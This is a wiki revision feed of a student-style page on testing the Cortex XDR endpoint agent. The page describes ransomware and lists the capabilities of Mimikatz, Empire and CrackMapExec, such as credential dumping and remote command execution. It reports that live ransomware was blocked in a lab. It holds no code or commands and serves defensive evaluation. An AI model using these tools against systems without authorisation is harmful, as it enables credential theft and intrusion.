Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
 From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
 Create a new installation package.&lt;br /&gt;
 Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
 Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
 Specify the installation package settings.&lt;br /&gt;
 Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
 Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
=== Execution Phase ===&lt;br /&gt;
&lt;br /&gt;
We executed the WannaCry and Cerber Ransomware on our Endpoint where the Agent was installed. The Agent blocked the executions and uploaded the data to a webUI. On the WebUI, we were able to analyse the blocked attack and view the processes which would have been generated on a Sandbox called Wildfire&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11470</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11470"/>
		<updated>2023-02-03T16:54:41Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting With Cortex XDR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
 From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
 Create a new installation package.&lt;br /&gt;
 Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
 Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
 Specify the installation package settings.&lt;br /&gt;
 Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
 Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
=== Execution Phase ===&lt;br /&gt;
&lt;br /&gt;
We executed the WannaCry and Cerber Ransomware on our Endpoint where the Agent was installed. The Agent blocked the executions and uploaded the data to a webUI. On the WebUI, we were able to&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11469</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11469"/>
		<updated>2023-02-03T16:51:46Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
